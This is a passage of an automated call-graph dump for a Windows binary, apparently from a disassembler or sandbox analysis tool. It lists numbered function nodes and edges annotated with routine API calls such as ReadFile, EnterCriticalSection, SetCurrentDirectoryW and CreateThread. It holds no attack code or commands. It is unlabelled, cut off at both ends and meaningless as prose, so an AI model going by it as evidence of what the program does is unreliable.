344526 93950->93951 93952 3b4fe0 93950->93952 93956 363a8d 93951->93956 93954 344534 93954->93829 93955->93822 93959 363a99 93956->93959 93957 363aa7 93969 367c0e 47 API calls 93957->93969 93959->93957 93960 363acd 93959->93960 93971 364e1c 93960->93971 93962 363aac 93970 366e10 8 API calls 93962->93970 93963 363ad3 93977 3639fe 81 API calls 93963->93977 93966 363ae2 93978 363b04 LeaveCriticalSection LeaveCriticalSection 93966->93978 93968 363ab7 93968->93954 93969->93962 93970->93968 93972 364e4e EnterCriticalSection 93971->93972 93973 364e2c 93971->93973 93975 364e44 93972->93975 93973->93972 93974 364e34 93973->93974 93976 367cf4 47 API calls 93974->93976 93975->93963 93976->93975 93977->93966 93978->93968 93982 363839 93979->93982 93981 344510 93981->93841 93983 363845 93982->93983 93984 36385b 93983->93984 93985 363888 93983->93985 93986 363880 93983->93986 94009 367c0e 47 API calls 93984->94009 93987 364e1c 48 API calls 93985->93987 93986->93981 93989 36388e 93987->93989 93995 36365b 93989->93995 93990 363875 94010 366e10 8 API calls 93990->94010 93999 363676 93995->93999 94002 363691 93995->94002 93996 363681 94110 367c0e 47 API calls 93996->94110 93998 363686 94111 366e10 8 API calls 93998->94111 93999->93996 93999->94002 94006 3636cf 93999->94006 94011 3638c2 LeaveCriticalSection LeaveCriticalSection 94002->94011 94003 3637e0 94113 367c0e 47 API calls 94003->94113 94006->94002 94006->94003 94012 362933 94006->94012 94019 36ee0e 94006->94019 94090 36eb66 94006->94090 94112 36ec87 47 API calls 94006->94112 94009->93990 94010->93986 94011->93986 94013 362952 94012->94013 94014 36293d 94012->94014 94013->94006 94015 367c0e 47 API calls 94014->94015 94016 362942 94015->94016 94017 366e10 8 API calls 94016->94017 94018 36294d 94017->94018 94018->94006 94020 36ee46 94019->94020 94021 36ee2f 94019->94021 94023 36f57e 94020->94023 94027 36ee80 94020->94027 94022 367bda 47 API calls 94021->94022 94024 36ee34 94022->94024 94025 367bda 47 API calls 94023->94025 94026 367c0e 47 API calls 94024->94026 94028 36f583 94025->94028 94070 36ee3b 94026->94070 94029 36ee88 94027->94029 94037 36ee9f 94027->94037 94030 367c0e 47 API calls 94028->94030 94031 367bda 47 API calls 94029->94031 94033 36ee94 94030->94033 94032 36ee8d 94031->94032 94039 367c0e 47 API calls 94032->94039 94034 366e10 8 API calls 94033->94034 94034->94070 94035 36eeb4 94036 367bda 47 API calls 94035->94036 94036->94032 94037->94035 94038 36eece 94037->94038 94040 36eeec 94037->94040 94037->94070 94038->94035 94044 36eed9 94038->94044 94039->94033 94042 3669d0 47 API calls 94040->94042 94045 36eefc 94042->94045 94043 373bf2 47 API calls 94046 36efed 94043->94046 94044->94043 94047 36ef04 94045->94047 94048 36ef1f 94045->94048 94050 36f066 ReadFile 94046->94050 94055 36f003 GetConsoleMode 94046->94055 94049 367c0e 47 API calls 94047->94049 94051 36f82f 49 API calls 94048->94051 94052 36ef09 94049->94052 94053 36f546 GetLastError 94050->94053 94054 36f088 94050->94054 94056 36ef2d 94051->94056 94057 367bda 47 API calls 94052->94057 94058 36f553 94053->94058 94059 36f046 94053->94059 94054->94053 94064 36f058 94054->94064 94060 36f017 94055->94060 94061 36f063 94055->94061 94056->94044 94062 36ef14 94057->94062 94063 367c0e 47 API calls 94058->94063 94068 367bed 47 API calls 94059->94068 94072 36f04c 94059->94072 94060->94061 94065 36f01d ReadConsoleW 94060->94065 94061->94050 94062->94070 94066 36f558 94063->94066 94064->94072 94073 36f0bd 94064->94073 94080 36f32a 94064->94080 94065->94064 94067 36f040 GetLastError 94065->94067 94069 367bda 47 API calls 94066->94069 94067->94059 94068->94072 94069->94072 94070->94006 94071 361c9d 47 API calls 94071->94070 94072->94070 94072->94071 94075 36f129 ReadFile 94073->94075 94081 36f1aa 94073->94081 94076 36f14a GetLastError 94075->94076 94089 36f154 94075->94089 94076->94089 94077 36f267 94084 36f217 MultiByteToWideChar 94077->94084 94085 36f82f 49 API calls 94077->94085 94078 36f257 94082 367c0e 47 API calls 94078->94082 94079 36f430 ReadFile 94083 36f453 GetLastError 94079->94083 94087 36f461 94079->94087 94080->94072 94080->94079 94081->94072 94081->94077 94081->94078 94081->94084 94082->94072 94083->94087 94084->94067 94084->94072 94085->94084 94086 36f82f 49 API calls 94086->94089 94087->94080 94088 36f82f 49 API calls 94087->94088 94088->94087 94089->94073 94089->94086 94091 36eb71 94090->94091 94095 36eb86 94090->94095 94092 367c0e 47 API calls 94091->94092 94093 36eb76 94092->94093 94094 366e10 8 API calls 94093->94094 94104 36eb81 94094->94104 94096 36ebbb 94095->94096 94097 373e24 47 API calls 94095->94097 94095->94104 94098 362933 47 API calls 94096->94098 94097->94096 94099 36ebcf 94098->94099 94100 36ed06 62 API calls 94099->94100 94101 36ebd6 94100->94101 94102 362933 47 API calls 94101->94102 94101->94104 94103 36ebf9 94102->94103 94103->94104 94105 362933 47 API calls 94103->94105 94104->94006 94106 36ec05 94105->94106 94106->94104 94107 362933 47 API calls 94106->94107 94108 36ec12 94107->94108 94109 362933 47 API calls 94108->94109 94109->94104 94110->93998 94111->94002 94112->94006 94113->93998 94117 36344a GetSystemTimeAsFileTime 94114->94117 94116 38bdc3 94116->93843 94118 363478 94117->94118 94118->94116 94120 363e71 94119->94120 94121 363e94 94120->94121 94122 363e7f 94120->94122 94124 364e1c 48 API calls 94121->94124 94133 367c0e 47 API calls 94122->94133 94126 363e9a 94124->94126 94125 363e84 94134 366e10 8 API calls 94125->94134 94135 363b0c 55 API calls 94126->94135 94129 363ea5 94136 363ec5 LeaveCriticalSection LeaveCriticalSection 94129->94136 94130 363e8f 94130->93848 94132 363eb7 94132->94130 94133->94125 94134->94130 94135->94129 94136->94132 94138 38c581 94137->94138 94139 38c417 94138->94139 94140 3444ed 64 API calls 94138->94140 94141 38bf5a GetSystemTimeAsFileTime 94138->94141 94142 344517 83 API calls 94138->94142 94139->93764 94139->93792 94140->94138 94141->94138 94142->94138 94144 38b97e 94143->94144 94145 38b970 94143->94145 94147 38b9c3 94144->94147 94148 363499 117 API calls 94144->94148 94158 38b987 94144->94158 94146 363499 117 API calls 94145->94146 94146->94144 94174 38bbe8 94147->94174 94149 38b9a8 94148->94149 94149->94147 94151 38b9b1 94149->94151 94155 3635e4 83 API calls 94151->94155 94151->94158 94152 38ba07 94153 38ba0b 94152->94153 94154 38ba2c 94152->94154 94157 38ba18 94153->94157 94160 3635e4 83 API calls 94153->94160 94178 38b7e5 94154->94178 94155->94158 94157->94158 94161 3635e4 83 API calls 94157->94161 94158->93793 94160->94157 94161->94158 94162 38ba5a 94187 38ba8a 94162->94187 94163 38ba3a 94166 3635e4 83 API calls 94163->94166 94167 38ba47 94163->94167 94166->94167 94167->94158 94169 3635e4 83 API calls 94167->94169 94169->94158 94171 38ba75 94171->94158 94173 3635e4 83 API calls 94171->94173 94173->94158 94175 38bc0d 94174->94175 94177 38bbf6 94174->94177 94176 36381e 64 API calls 94175->94176 94176->94177 94177->94152 94179 36395c 47 API calls 94178->94179 94180 38b7f4 94179->94180 94181 36395c 47 API calls 94180->94181 94182 38b808 94181->94182 94183 36395c 47 API calls 94182->94183 94184 38b81c 94183->94184 94185 38bb64 47 API calls 94184->94185 94186 38b82f 94184->94186 94185->94186 94186->94162 94186->94163 94188 38baa0 94187->94188 94189 38bb51 94188->94189 94191 38ba61 94188->94191 94193 38b841 64 API calls 94188->94193 94220 38b942 64 API calls 94188->94220 94221 38bc67 80 API calls 94188->94221 94216 38bd8a 94189->94216 94195 38bb64 94191->94195 94193->94188 94196 38bb77 94195->94196 94197 38bb71 94195->94197 94199 361c9d 47 API calls 94196->94199 94200 38bb88 94196->94200 94198 361c9d 47 API calls 94197->94198 94198->94196 94199->94200 94201 361c9d 47 API calls 94200->94201 94202 38ba68 94200->94202 94201->94202 94202->94171 94203 3635e4 94202->94203 94204 3635f0 94203->94204 94205 363604 94204->94205 94206 36361c 94204->94206 94266 367c0e 47 API calls 94205->94266 94208 364e1c 48 API calls 94206->94208 94213 363614 94206->94213 94210 36362e 94208->94210 94209 363609 94267 366e10 8 API calls 94209->94267 94250 363578 94210->94250 94213->94171 94217 38bda8 94216->94217 94218 38bd97 94216->94218 94217->94191 94222 362aae 94218->94222 94220->94188 94221->94188 94223 362aba 94222->94223 94224 362ad4 94223->94224 94225 362aec 94223->94225 94226 362ae4 94223->94226 94247 367c0e 47 API calls 94224->94247 94227 364e1c 48 API calls 94225->94227 94226->94217 94229 362af2 94227->94229 94235 362957 94229->94235 94230 362ad9 94248 366e10 8 API calls 94230->94248 94237 362966 94235->94237 94244 362984 94235->94244 94236 362974 94238 367c0e 47 API calls 94236->94238 94237->94236 94239 36299c 94237->94239 94237->94244 94240 362979 94238->94240 94242 368e63 78 API calls 94239->94242 94243 362c84 78 API calls 94239->94243 94239->94244 94245 362933 47 API calls 94239->94245 94246 36af61 78 API calls 94239->94246 94241 366e10 8 API calls 94240->94241 94241->94244 94242->94239 94243->94239 94249 362b24 LeaveCriticalSection LeaveCriticalSection 94244->94249 94245->94239 94246->94239 94247->94230 94248->94226 94249->94226 94251 363587 94250->94251 94252 36359b 94250->94252 94302 367c0e 47 API calls 94251->94302 94254 363597 94252->94254 94269 362c84 94252->94269 94268 363653 LeaveCriticalSection LeaveCriticalSection 94254->94268 94256 36358c 94303 366e10 8 API calls 94256->94303 94261 362933 47 API calls 94262 3635b5 94261->94262 94279 36e9d2 94262->94279 94264 3635bb 94264->94254 94265 361c9d 47 API calls 94264->94265 94265->94254 94266->94209 94267->94213 94268->94213 94270 362c97 94269->94270 94271 362cbb 94269->94271 94270->94271 94272 362933 47 API calls 94270->94272 94275 36eb36 94271->94275 94273 362cb4 94272->94273 94304 36af61 94273->94304 94276 3635af 94275->94276 94277 36eb43 94275->94277 94276->94261 94277->94276 94278 361c9d 47 API calls 94277->94278 94278->94276 94280 36e9de 94279->94280 94281 36e9e6 94280->94281 94286 36e9fe 94280->94286 94353 367bda 47 API calls 94281->94353 94283 36ea7b 94357 367bda 47 API calls 94283->94357 94284 36e9eb 94354 367c0e 47 API calls 94284->94354 94286->94283 94289 36ea28 94286->94289 94288 36ea80 94358 367c0e 47 API calls 94288->94358 94329 36a8ed 94289->94329 94292 36ea88 94359 366e10 8 API calls 94292->94359 94293 36ea2e 94295 36ea41 94293->94295 94296 36ea4c 94293->94296 94338 36ea9c 94295->94338 94355 367c0e 47 API calls 94296->94355 94298 36e9f3 94298->94264 94300 36ea47 94356 36ea73 LeaveCriticalSection 94300->94356 94302->94256 94303->94254 94305 36af6d 94304->94305 94306 36af75 94305->94306 94307 36af8d 94305->94307 94308 367bda 47 API calls 94306->94308 94309 36b022 94307->94309 94313 36afbf 94307->94313 94310 36af7a 94308->94310 94311 367bda 47 API calls 94309->94311 94312 367c0e 47 API calls 94310->94312 94314 36b027 94311->94314 94325 36af82 94312->94325 94315 36a8ed 49 API calls 94313->94315 94316 367c0e 47 API calls 94314->94316 94317 36afc5 94315->94317 94318 36b02f 94316->94318 94319 36afeb 94317->94319 94320 36afd8 94317->94320 94321 366e10 8 API calls 94318->94321 94323 367c0e 47 API calls 94319->94323 94322 36b043 75 API calls 94320->94322 94321->94325 94324 36afe4 94322->94324 94326 36aff0 94323->94326 94328 36b01a LeaveCriticalSection 94324->94328 94325->94271 94327 367bda 47 API calls 94326->94327 94327->94324 94328->94325 94330 36a8f9 94329->94330 94331 36a946 EnterCriticalSection 94330->94331 94333 367cf4 47 API calls 94330->94333 94332 36a96c 94331->94332 94332->94293 94334 36a91d 94333->94334 94335 36a93a 94334->94335 94336 36a928 InitializeCriticalSectionAndSpinCount 94334->94336 94337 36a970 LeaveCriticalSection 94335->94337 94336->94335 94337->94331 94339 36aba4 47 API calls 94338->94339 94342 36eaaa 94339->94342 94340 36eb00 94341 36ab1e 48 API calls 94340->94341 94346 36eb08 94341->94346 94342->94340 94343 36eade 94342->94343 94344 36aba4 47 API calls 94342->94344 94343->94340 94345 36aba4 47 API calls 94343->94345 94347 36ead5 94344->94347 94348 36eaea CloseHandle 94345->94348 94349 36eb2a 94346->94349 94352 367bed 47 API calls 94346->94352 94350 36aba4 47 API calls 94347->94350 94348->94340 94351 36eaf6 GetLastError 94348->94351 94349->94300 94350->94343 94351->94340 94352->94349 94353->94284 94354->94298 94355->94300 94356->94298 94357->94288 94358->94292 94359->94298 94360->93697 94361->93697 94362->93698 94363->93711 94364->93713 94365->93710 94366->93727 94367->93723 94369 36f8a0 94368->94369 94370 3440b4 GetLongPathNameW 94369->94370 94371 346a63 48 API calls 94370->94371 94372 3440dc 94371->94372 94373 3449a0 94372->94373 94374 34d7f7 48 API calls 94373->94374 94375 3449b2 94374->94375 94376 34660f 49 API calls 94375->94376 94377 3449bd 94376->94377 94378 3449c8 94377->94378 94379 3b2e35 94377->94379 94381 3464cf 48 API calls 94378->94381 94383 3b2e4f 94379->94383 94426 35d35e 60 API calls 94379->94426 94382 3449d4 94381->94382 94420 3428a6 94382->94420 94385 3449e7 94385->93556 94387 3441a9 136 API calls 94386->94387 94388 34415e 94387->94388 94389 3b3489 94388->94389 94390 3441a9 136 API calls 94388->94390 94391 38c396 122 API calls 94389->94391 94392 344172 94390->94392 94393 3b349e 94391->94393 94392->94389 94394 34417a 94392->94394 94395 3b34bf 94393->94395 94396 3b34a2 94393->94396 94398 3b34aa 94394->94398 94399 344186 94394->94399 94397 35f4ea 48 API calls 94395->94397 94400 344252 84 API calls 94396->94400 94419 3b3504 94397->94419 94529 386b49 87 API calls 94398->94529 94427 34c833 94399->94427 94400->94398 94404 3b34b8 94404->94395 94405 3b36b4 94406 361c9d 47 API calls 94405->94406 94407 3b36bc 94406->94407 94408 344252 84 API calls 94407->94408 94409 3b36c5 94408->94409 94413 361c9d 47 API calls 94409->94413 94414 344252 84 API calls 94409->94414 94533 3825b5 86 API calls 94409->94533 94413->94409 94414->94409 94416 34ce19 48 API calls 94416->94419 94419->94405 94419->94409 94419->94416 94515 34ba85 94419->94515 94523 344dd9 94419->94523 94530 382551 48 API calls 94419->94530 94531 382472 60 API calls 94419->94531 94532 389c12 48 API calls 94419->94532 94421 3428b8 94420->94421 94425 3428d7 94420->94425 94423 35f4ea 48 API calls 94421->94423 94422 35f4ea 48 API calls 94424 3428ee 94422->94424 94423->94425 94424->94385 94425->94422 94426->94379 94428 34c843 94427->94428 94429 34c860 94428->94429 94430 3b3095 94428->94430 94539 3448ba 49 API calls 94429->94539 94558 3825b5 86 API calls 94430->94558 94433 34c882 94540 344550 56 API calls 94433->94540 94434 3b30a8 94559 3825b5 86 API calls 94434->94559 94436 34c897 94436->94434 94438 34c89f 94436->94438 94440 34d7f7 48 API calls 94438->94440 94439 3b30c4 94442 34c90c 94439->94442 94441 34c8ab 94440->94441 94541 35e968 49 API calls 94441->94541 94444 3b30d7 94442->94444 94445 34c91a 94442->94445 94448 344907 CloseHandle 94444->94448 94544 361dfc 94445->94544 94446 34c8b7 94449 34d7f7 48 API calls 94446->94449 94450 3b30e3 94448->94450 94451 34c8c3 94449->94451 94452 3441a9 136 API calls 94450->94452 94453 34660f 49 API calls 94451->94453 94454 3b310d 94452->94454 94455 34c8d1 94453->94455 94457 3b3136 94454->94457 94462 38c396 122 API calls 94454->94462 94542 35eb66 SetFilePointerEx ReadFile 94455->94542 94456 34c943 94461 34c96d SetCurrentDirectoryW 94456->94461 94560 3825b5 86 API calls 94457->94560 94459 34c8fd 94543 3446ce SetFilePointerEx SetFilePointerEx 94459->94543 94465 35f4ea 48 API calls 94461->94465 94466 3b3129 94462->94466 94464 3b314d 94499 34cad1 94464->94499 94467 34c988 94465->94467 94468 3b3152 94466->94468 94469 3b3131 94466->94469 94471 3447b7 48 API calls 94467->94471 94470 344252 84 API calls 94468->94470 94472 344252 84 API calls 94469->94472 94473 3b3157 94470->94473 94502 34c993 94471->94502 94472->94457 94474 35f4ea 48 API calls 94473->94474 94481 3b3194 94474->94481 94475 34ca9d 94554 344907 94475->94554 94479 343d98 94479->93429 94479->93453 94480 34caa9 SetCurrentDirectoryW 94480->94499 94483 34ba85 48 API calls 94481->94483 94512 3b31dd 94483->94512 94485 3b33ce 94565 389b72 48 API calls 94485->94565 94486 3b3467 94569 3825b5 86 API calls 94486->94569 94490 3b3480 94490->94475 94491 3b33f0 94566 3a29e8 48 API calls 94491->94566 94493 3b33fd 94495 361c9d 47 API calls 94493->94495 94494 3b345f 94568 38240b 48 API calls 94494->94568 94495->94499 94497 34ce19 48 API calls 94497->94502 94534 3448dd 94499->94534 94500 34ba85 48 API calls 94500->94512 94502->94475 94502->94486 94502->94494 94502->94497 94547 34b337 56 API calls 94502->94547 94548 35c258 GetStringTypeW 94502->94548 94549 34cb93 59 API calls 94502->94549 94550 34cb5a GetStringTypeW 94502->94550 94551 3616d0 GetStringTypeW 94502->94551 94552 34cc24 162 API calls 94502->94552 94553 35c682 48 API calls 94502->94553 94506 34ce19 48 API calls 94506->94512 94509 3b3420 94567 3825b5 86 API calls 94509->94567 94511 3b3439 94513 361c9d 47 API calls 94511->94513 94512->94485 94512->94500 94512->94506 94512->94509 94561 382551 48 API calls 94512->94561 94562 382472 60 API calls 94512->94562 94563 389c12 48 API calls 94512->94563 94564 35c682 48 API calls 94512->94564 94514 3b344c 94513->94514 94514->94499 94516 34bb25 94515->94516 94521 34ba98 94515->94521 94518 35f4ea 48 API calls 94516->94518 94517 35f4ea 48 API calls 94519 34ba9f 94517->94519 94518->94521 94520 35f4ea 48 API calls 94519->94520 94522 34bac8 94519->94522 94520->94522 94521->94517 94522->94419 94524 344dec 94523->94524 94527 344e9a 94523->94527 94525 35f4ea 48 API calls 94524->94525 94528 344e1e 94524->94528 94525->94528 94526 35f4ea 48 API calls 94526->94528 94527->94419 94528->94526 94528->94527 94529->94404 94530->94419 94531->94419 94532->94419 94533->94409 94535 344907 CloseHandle 94534->94535 94536 3448e5 94535->94536 94537 344907 CloseHandle 94536->94537 94538 3448fc 94537->94538 94538->94479 94539->94433 94540->94436 94541->94446 94542->94459 94543->94442 94570 361e46 94544->94570 94547->94502 94548->94502 94549->94502 94550->94502 94551->94502 94552->94502 94553->94502 94555 344920 94554->94555 94556 344911 94554->94556 94555->94556 94557 344925 CloseHandle 94555->94557 94556->94480 94557->94556 94558->94434 94559->94439 94560->94464 94561->94512 94562->94512 94563->94512 94564->94512 94565->94491 94566->94493 94567->94511 94568->94486 94569->94490 94571 361e61 94570->94571 94574 361e55 94570->94574 94594 367c0e 47 API calls 94571->94594 94573 362019 94576 361e41 94573->94576 94595 366e10 8 API calls 94573->94595 94574->94571 94585 361ed4 94574->94585 94589 369d6b 47 API calls 94574->94589 94576->94456 94577 361f41 94579 361fa0 94577->94579 94580 361f5f 94577->94580 94579->94571 94579->94576 94581 361fb0 94579->94581 94580->94571 94586 361f7b 94580->94586 94591 369d6b 47 API calls 94580->94591 94593 369d6b 47 API calls 94581->94593 94584 361f91 94592 369d6b 47 API calls 94584->94592 94585->94571 94585->94577 94590 369d6b 47 API calls 94585->94590 94586->94571 94586->94576 94586->94584 94589->94585 94590->94577 94591->94586 94592->94576 94593->94576 94594->94573 94595->94576 94597 344d94 94596->94597 94598 344c8b 94596->94598 94597->93562 94598->94597 94599 35f4ea 48 API calls 94598->94599 94600 344cb2 94599->94600 94601 35f4ea 48 API calls 94600->94601 94605 344d22 94601->94605 94604 344dd9 48 API calls 94604->94605 94605->94597 94605->94604 94606 34ba85 48 API calls 94605->94606 94609 34b470 94605->94609 94637 389af1 48 API calls 94605->94637 94606->94605 94607->93564 94608->93566 94638 346b0f 94609->94638 94611 34b69b 94612 34ba85 48 API calls 94611->94612 94613 34b6b5 94612->94613 94613->94605 94616 34ba85 48 API calls 94630 34b495 94616->94630 94617 3b397b 94648 3826bc 88 API calls 94617->94648 94620 34b9e4 94649 3826bc 88 API calls 94620->94649 94621 3b3973 94621->94613 94624 3b3989 94626 34ba85 48 API calls 94624->94626 94625 34bcce 48 API calls 94625->94630 94626->94621 94627 3b3909 94629 346b4a 48 API calls 94627->94629 94628 34bb85 48 API calls 94628->94630 94631 3b3914 94629->94631 94630->94611 94630->94616 94630->94617 94630->94620 94630->94625 94630->94627 94630->94628 94633 34bdfa 48 API calls 94630->94633 94636 3b3939 94630->94636 94643 34c413 59 API calls 94630->94643 94644 34bc74 48 API calls 94630->94644 94645 34c6a5 49 API calls 94630->94645 94646 34c799 48 API calls 94630->94646 94635 35f4ea 48 API calls 94631->94635 94634 34b66c CharUpperBuffW 94633->94634 94634->94630 94635->94636 94647 3826bc 88 API calls 94636->94647 94637->94605 94639 35f4ea 48 API calls 94638->94639 94640 346b34 94639->94640 94641 346b4a 48 API calls 94640->94641 94642 346b43 94641->94642 94642->94630 94643->94630 94644->94630 94645->94630 94646->94630 94647->94621 94648->94624 94649->94621 94651 3b418d EnumResourceNamesW 94650->94651 94652 34403c LoadImageW 94650->94652 94653 343ee1 RegisterClassExW 94651->94653 94652->94653 94654 343f53 7 API calls 94653->94654 94654->93581 94656 344c44 94655->94656 94657 3b3c33 94655->94657 94656->93587 94681 385819 61 API calls 94656->94681 94657->94656 94658 3b3c3c DestroyIcon 94657->94658 94658->94656 94660 3451cb 94659->94660 94680 3452a2 94659->94680 94661 346b0f 48 API calls 94660->94661 94680->93592 94681->93587 94683 34ef1d 94682->94683 94684 34ef2f 94682->94684 94683->93626 94883 38cc5c 86 API calls 94684->94883 94686 3b86f9 94686->94686 94688 34f130 94687->94688 94690 34fe30 331 API calls 94688->94690 94695 34f199 94688->94695 94689 34f595 94698 34d7f7 48 API calls 94689->94698 94706 34f431 94689->94706 94692 3b8728 94690->94692 94691 3b87c8 94888 38cc5c 86 API calls 94691->94888 94692->94695 94885 38cc5c 86 API calls 94692->94885 94693 34f418 94702 3b8b1b 94693->94702 94693->94706 94737 34f6aa 94693->94737 94695->94689 94699 34d7f7 48 API calls 94695->94699 94725 34f229 94695->94725 94741 34f3dd 94695->94741 94696 34fe30 331 API calls 94696->94706 94700 3b87a3 94698->94700 94703 3b8772 94699->94703 94701 34f3f2 94701->94693 94889 389af1 48 API calls 94701->94889 94886 360f0a 52 API calls 94703->94886 94704 38cc5c 86 API calls 94704->94706 94706->94696 94706->94704 94710 34d6e9 55 API calls 94706->94710 94711 3b8c53 94706->94711 94714 3b8b7e 94706->94714 94722 3b8beb 94706->94722 94726 351b90 48 API calls 94706->94726 94728 34f537 94706->94728 94733 34fce0 94706->94733 94884 34dd47 48 API calls 94706->94884 94896 3797ed InterlockedDecrement 94706->94896 94904 35c1af 48 API calls 94706->94904 94710->94706 94725->94689 94725->94693 94725->94706 94725->94741 94726->94706 94728->93626 94733->94728 94737->94706 94737->94728 94737->94733 94741->94691 94741->94701 94741->94706 94753 354637 94752->94753 94754 35479f 94752->94754 94755 354643 94753->94755 94756 3b6e05 94753->94756 94757 34ce19 48 API calls 94754->94757 94905 354300 94755->94905 94973 39e822 94756->94973 94764 3546e4 94757->94764 94920 396ff0 94764->94920 94929 38fa0c 94764->94929 94970 386524 94764->94970 94768->93626 95094 34bd30 94769->95094 94771 353267 94773 3b907a 94771->94773 94774 3532f8 94771->94774 94831 353628 94771->94831 95117 38cc5c 86 API calls 94773->95117 95112 35c36b 86 API calls 94774->95112 94840 353635 94831->94840 95116 38cc5c 86 API calls 94831->95116 94840->93626 94841->93626 94842->93626 94843->93597 94844->93600 94845->93605 94846->93626 94847->93626 94848->93639 94849->93639 94850->93639 94852 34fe50 94851->94852 94873 34fe7e 94851->94873 94853 35f4ea 48 API calls 94852->94853 94853->94873 94854 360f0a 52 API calls 94854->94873 94855 35146e 94856 346eed 48 API calls 94855->94856 94865 34ffe1 94856->94865 94857 351473 95139 38cc5c 86 API calls 94857->95139 94858 3797ed InterlockedDecrement 94858->94873 94859 350509 95140 38cc5c 86 API calls 94859->95140 94860 35f4ea 48 API calls 94860->94873 94863 346eed 48 API calls 94863->94873 94865->93626 94866 3ba246 94868 346eed 48 API calls 94866->94868 94867 3ba922 94867->93626 94868->94865 94871 34d7f7 48 API calls 94871->94873 94872 3ba873 94872->93626 94873->94854 94873->94855 94873->94857 94873->94858 94873->94859 94873->94860 94873->94863 94873->94865 94873->94866 94873->94871 94874 3ba30e 94873->94874 94876 3ba973 94873->94876 94879 3515b5 94873->94879 95135 351820 331 API calls 94873->95135 95136 351d10 59 API calls 94873->95136 94874->94865 95137 3797ed InterlockedDecrement 94874->95137 95141 38cc5c 86 API calls 94876->95141 94878 3ba982 95138 38cc5c 86 API calls 94879->95138 94880->93639 94881->93639 94882->93639 94883->94686 94884->94706 94885->94695 94886->94725 94888->94728 94896->94706 94904->94706 94906 3b6e60 94905->94906 94909 35432c 94905->94909 95015 38cc5c 86 API calls 94906->95015 94921 34936c 81 API calls 94920->94921 94930 38fa1c 94929->94930 95082 386ca9 GetFileAttributesW 94970->95082 94974 39e868 94973->94974 94975 39e84e 94973->94975 95095 34bd3f 95094->95095 95098 34bd5a 95094->95098 95096 34bdfa 48 API calls 95095->95096 95097 34bd47 CharUpperBuffW 95096->95097 95097->95098 95098->94771 95116->94840 95135->94873 95136->94873 95137->94865 95138->94865 95139->94872 95140->94867 95141->94878 95142 3b19cb 95147 342322 95142->95147 95144 3b19d1 95180 360f0a 52 API calls 95144->95180 95146 3b19db 95148 342344 95147->95148 95181 3426df 95148->95181 95153 34d7f7 48 API calls 95154 342384 95153->95154 95155 34d7f7 48 API calls 95154->95155 95156 34238e 95155->95156 95157 34d7f7 48 API calls 95156->95157 95158 342398 95157->95158 95159 34d7f7 48 API calls 95158->95159 95160 3423de 95159->95160 95161 34d7f7 48 API calls 95160->95161 95162 3424c1 95161->95162 95189 34263f 95162->95189 95166 3424f1 95167 34d7f7 48 API calls 95166->95167 95168 3424fb 95167->95168 95218 342745 95168->95218 95170 342546 95171 342556 GetStdHandle 95170->95171 95172 3425b1 95171->95172 95173 3b501d 95171->95173 95174 3425b7 CoInitialize 95172->95174 95173->95172 95175 3b5026 95173->95175 95174->95144 95225 3892d4 53 API calls 95175->95225 95177 3b502d 95226 3899f9 CreateThread 95177->95226 95179 3b5039 CloseHandle 95179->95174 95180->95146 95227 342854 95181->95227 95184 346a63 48 API calls 95185 34234a 95184->95185 95186 34272e 95185->95186 95241 3427ec 6 API calls 95186->95241 95188 34237a 95188->95153 95190 34d7f7 48 API calls 95189->95190 95191 34264f 95190->95191 95192 34d7f7 48 API calls 95191->95192 95193 342657 95192->95193 95242 3426a7 95193->95242 95196 3426a7 48 API calls 95197 342667 95196->95197 95198 34d7f7 48 API calls 95197->95198 95199 342672 95198->95199 95200 35f4ea 48 API calls 95199->95200 95201 3424cb 95200->95201 95202 3422a4 95201->95202 95203 3422b2 95202->95203 95204 34d7f7 48 API calls 95203->95204 95205 3422bd 95204->95205 95206 34d7f7 48 API calls 95205->95206 95207 3422c8 95206->95207 95208 34d7f7 48 API calls 95207->95208 95209 3422d3 95208->95209 95210 34d7f7 48 API calls 95209->95210 95211 3422de 95210->95211 95212 3426a7 48 API calls 95211->95212 95213 3422e9 95212->95213 95214 35f4ea 48 API calls 95213->95214 95215 3422f0 95214->95215 95216 3b1fe7 95215->95216 95217 3422f9 RegisterWindowMessageW 95215->95217 95217->95166 95219 342755 95218->95219 95220 3b5f4d 95218->95220 95221 35f4ea 48 API calls 95219->95221 95247 38c942 50 API calls 95220->95247 95224 34275d 95221->95224 95223 3b5f58 95224->95170 95225->95177 95226->95179 95248 3899df 54 API calls 95226->95248 95234 342870 95227->95234 95230 342870 48 API calls 95231 342864 95230->95231 95232 34d7f7 48 API calls 95231->95232 95233 342716 95232->95233 95233->95184 95235 34d7f7 48 API calls 95234->95235 95236 34287b 95235->95236 95237 34d7f7 48 API calls 95236->95237 95238 342883 95237->95238 95239 34d7f7 48 API calls 95238->95239 95240 34285c 95239->95240 95240->95230 95241->95188 95243 34d7f7 48 API calls 95242->95243 95244 3426b0 95243->95244 95245 34d7f7 48 API calls 95244->95245 95246 34265f 95245->95246 95246->95196 95247->95223 95249 351407 95279 35d3be 95249->95279 95251 35141d 95288 35d922 95251->95288 95254 35f4ea 48 API calls 95273 34fec8 95254->95273 95255 35146e 95263 346eed 48 API calls 95255->95263 95257 350509 95305 38cc5c 86 API calls 95257->95305 95258 346eed 48 API calls 95258->95273 95260 351473 95304 38cc5c 86 API calls 95260->95304 95261 3ba246 95264 346eed 48 API calls 95261->95264 95262 3ba922 95276 34ffe1 95263->95276 95264->95276 95267 3ba873 95268 3ba30e 95268->95276 95302 3797ed InterlockedDecrement 95268->95302 95269 3797ed InterlockedDecrement 95269->95273 95270 34d7f7 48 API calls 95270->95273 95271 360f0a 52 API calls 95271->95273 95273->95254 95273->95255 95273->95257 95273->95258 95273->95260 95273->95261 95273->95268 95273->95269 95273->95270 95273->95271 95274 3ba973 95273->95274 95273->95276 95278 35144d 95273->95278 95300 351820 331 API calls 95273->95300 95301 351d10 59 API calls 95273->95301 95306 38cc5c 86 API calls 95274->95306 95277 3ba982 95303 38cc5c 86 API calls 95278->95303 95280 35d3dc 95279->95280 95281 35d3ca 95279->95281 95283 35d3e2 95280->95283 95284 35d40b 95280->95284 95307 34dcae 50 API calls 95281->95307 95286 35f4ea 48 API calls 95283->95286 95308 34dcae 50 API calls 95284->95308 95287 35d3d4 95286->95287 95287->95251 95289 346b0f 48 API calls 95288->95289 95290 35d947 95289->95290 95291 35d975 95290->95291 95292 34ce19 48 API calls 95290->95292 95291->95273 95293 3babcf 95292->95293 95294 34510d 48 API calls 95293->95294 95295 3babdd 95294->95295 95296 34d645 53 API calls 95295->95296 95297 3babef 95296->95297 95299 3babf4 95297->95299 95309 34dcae 50 API calls 95297->95309 95299->95273 95300->95273 95301->95273 95302->95276 95303->95276 95304->95267 95305->95262 95306->95277 